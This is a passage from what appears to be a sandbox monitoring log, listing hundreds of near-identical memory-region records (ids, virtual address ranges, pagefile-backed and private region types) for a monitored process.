0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19103 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19104 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19105 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19106 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19107 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19108 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19109 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19110 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19111 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19112 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19113 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19114 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19115 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19116 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19117 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19118 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19119 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19120 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19121 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19122 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19123 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19124 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19125 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19126 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19127 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19128 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19129 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19130 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19131 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19132 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19133 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19134 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19135 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19136 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19137 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19138 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19139 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 19140 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19141 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19142 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19143 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19144 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19145 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19146 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19147 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19148 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19149 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19150 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19151 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19152 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19153 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19154 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19155 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19156 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19157 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19158 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19159 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19160 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19161 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19162 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19163 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19164 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19165 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19166 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19167 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19168 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19169 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19170 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19171 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19172 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19173 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19174 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19175 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19176 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19177 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19178 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19179 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19180 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19181 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 19182 start_va = 0x7770000 end_va = 0x778ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007770000" filename = "" Region: id = 19183 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19184 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19185 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19186 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19187 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19188 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19189 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19190 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19191 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19192 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19193 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19194 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19195 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19196 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19197 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19198 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19199 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19200 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19201 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19202 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19203 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19204 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19205 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19206 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19207 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19208 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19209 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19210 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19211 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19212 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19213 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19214 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19215 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19216 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19217 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19218 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19219 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19220 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19221 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19222 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19223 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19224 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19225 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19226 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19227 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19228 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19229 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19230 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19231 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19232 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19233 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19234 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19235 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19236 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19237 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19238 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19239 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19240 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19241 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19242 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19243 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19244 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19245 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19246 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19247 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19248 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19249 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19250 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19251 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19252 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19253 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19254 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19255 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19256 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19257 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19258 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19259 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19260 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19261 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19262 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19263 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19264 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19265 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19266 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19267 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19268 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19269 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19270 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19271 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19272 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19273 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19274 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19275 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19276 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19277 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19278 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19279 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19280 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19281 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19282 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19283 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19284 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19285 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19286 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19287 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19288 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 19289 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 